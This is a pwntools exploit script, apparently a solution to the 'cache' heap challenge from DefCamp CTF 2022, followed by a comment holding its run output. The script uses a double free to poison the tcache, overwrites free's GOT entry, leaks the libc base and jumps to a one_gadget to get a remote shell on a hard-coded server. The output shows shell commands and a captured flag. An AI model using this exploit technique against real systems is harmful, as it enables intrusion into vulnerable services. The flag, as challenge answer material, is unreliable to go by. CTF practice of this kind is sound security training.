Defcamp-CTF-2022_cache

cache.py

from pwn import *

local = False
libc = ELF("./libc.so.6", checksec = False)
binary = ELF("./vuln", checksec = False)

def menu(n):
	io.recvuntil("\nChoice: ")
	io.sendline(str(n))
	
def cache_new_admin():
	menu(1)
	

def cache_new_user(s):
	menu(2)
	io.recvuntil("What is your name: ")
	io.sendline(s)
	
def cache_print_admin():
	menu(3)
	
def cache_edit_user(s):
	menu(4)
	io.recvuntil("What is your name: ")
	io.sendline(s)
	
def cache_print_user():
	menu(5)
	io.recvuntil("Students name is ")
	return io.recv(6)
	
def cache_delete_admin():
	menu(6)
	
def cache_delete_user():
	menu(7)

io = process(binary.path) if local else remote("34.159.7.96", 32552)
cache_new_user("")
cache_delete_user()
cache_delete_user()
cache_edit_user(p64(binary.got['free']))
cache_new_user("")
cache_new_user("")
libc.address = u64(cache_print_user().ljust(8, '\0')) - 0x9790a
puts = libc.sym['puts']
one_gadget = libc.address + 0x10a38c
log.success("base libc 0x%08x" % libc.address)
log.success("one_gadget 0x%08x" % one_gadget)
cache_edit_user(p64(one_gadget) + p64(puts))
cache_delete_user()
io.interactive()

'''
[+] Opening connection to 34.159.7.96 on port 32552: Done
[+] base libc 0x7f98fd152000
[+] one_gadget 0x7f98fd25c38c
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=3000 groups=3000,2000
$ ls
flag.txt  ld-2.27.so  libc.so.6  real_flag.txt    vuln  vuln.c
$ cat real_flag.txt
CTF{ab7bdaa3e5ed17ed326fef624a2d95d6ea62caa3dba6d1e5493936c362eed40e}
'''